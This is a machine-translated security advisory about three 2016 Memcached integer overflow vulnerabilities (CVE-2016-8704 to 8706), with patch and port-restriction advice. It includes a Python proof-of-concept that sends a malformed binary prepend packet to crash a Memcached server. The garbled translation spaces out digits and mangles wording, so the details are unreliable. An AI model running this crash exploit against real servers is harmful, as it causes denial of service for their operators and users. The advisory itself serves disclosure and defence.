Memcached fix multiple high-risk vulnerabilities can lead to code execution, denial of service-vulnerability warning-the black bar safety net

2016-11-02T00:00:00
ID MYHACK58:62201680790
Type myhack58
Reporter 佚名
Modified 2016-11-02T00:00:00

Description

! Background description Memcached is a free open-source, high-performance, distributed memory object caching system. Memcached is based on LiveJournal's Danga Interactive company of Brad Fitzpatric led the development of a software. Has now become MySpace, the hatena and Facebook, the Vox, LiveJournal and many other services to improve Web application scalability an important factor. Memcached is a memory based key-value store, used to store small chunks of arbitrary data strings objects. These data may be database calls, API calls or page rendering results. Essentially, it is a simple key-value storage system. The General purpose is to, by caching database query results to reduce database access times, to improve the dynamic Web application speed and improve scalability. Vulnerability description 2 0 1 6 years 1 0 months 3 1, Memcached release security patches to fix multiple remote code execution vulnerabilities, exploit the vulnerability the hacker can steal in Memcached stored in the business data, or cause the Memcached service to crash resulting in a denial of service and other hazards, safe client to remind the user should be timely to upgrade to the official version to 1. 4. 3 3 version. Memcached exist multiple integer overflow vulnerabilities can lead to remote code execution. These vulnerabilities exist in the for insert inserting, the additional appending, and before the prepending, and modify key-value pairs of the function, in the SASL authentication position is also problematic. An attacker can send to the server a carefully constructed Memcached command realized the vulnerability of the use. In addition, these holes can also leak sensitive process information, and can be triggered multiple times, the use of these sensitive process information, the attacker can bypass the like ASLR and other common exploit mitigation mechanisms. Since it is possible to bypass these Common Vulnerability mitigation mechanisms, such that the vulnerability is particularly serious. Although Memcached document has been strongly recommended that the Memcached service configuration in a trusted network environment, but there are still a large number of Memcached services in the public network direct access. In addition, even if Memcached is deployed in the network, corporate security managers still can't ignore this update of security problems, hackers may be through network penetration, SSRF vulnerability, etc., directly on the deployment, including the network of service attack. Vulnerability number CVE-2 0 1 6-8 7 0 4 - Memcached Append/Prepend remote code execution vulnerability CVE-2 0 1 6-8 7 0 5 - Memcached Update remote code execution vulnerability CVE-2 0 1 6-8 7 0 6 - Memcached SASL authentication remote code execution vulnerability Exploit code for POC: the below code can lead to a service crash, denial of service, please do not easily try) import struct import socket import sys MEMCACHED_REQUEST_MAGIC = "\x80" OPCODE_PREPEND_Q = "\x1a" key_len = struct. pack("! H",0xfa) extra_len = "\x00" data_type = "\x00" vbucket = "\x00\x00" body_len = struct. pack("! I",0) opaque = struct. pack("! I",0) CAS = struct. pack("! Q",0) body = "A"*1 0 2 4 if len(sys. argv) != 3: print "./ poc_crash.py " packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len packet += data_type + vbucket + body_len + opaque + CAS packet += body set_packet = "set testkey 0 6 0 4\r\ntest\r\n" get_packet = "get testkey\r\n" s1 = socket. socket(socket. AF_INET, socket. SOCK_STREAM) s1. connect((sys. argv[1],int(sys. argv[2]))) s1. sendall(set_packet) print s1. recv(1 0 2 4) s1. close() s2 = socket. socket(socket. AF_INET, socket. SOCK_STREAM) s2. connect((sys. argv[1],int(sys. argv[2]))) s2. sendall(packet) print s2. recv(1 0 2 4) s2. close() s3 = socket. socket(socket. AF_INET, socket. SOCK_STREAM) s3. connect((sys. argv[1],int(sys. argv[2]))) s3. sendall(get_packet) s3. recv(1 0 2 4) s3. close() Test results: ! The domestic impact of Statistics: the following data from the fofa. so) ! Vulnerability details Technical details, analysis http://www.talosintelligence.com/reports/TALOS-2016-0219/ http://www.talosintelligence.com/reports/TALOS-2016-0220/ http://www.talosintelligence.com/reports/TALOS-2016-0221/ Solutions 1. Upgrade to the latest official version: 1.4.33 version http://www.memcached.org/files/memcached-1.4.33.tar.gz 2. Restrict Memcached 1 1 2 1 1 port access rights, such as: the prohibition of external network access, only specific port access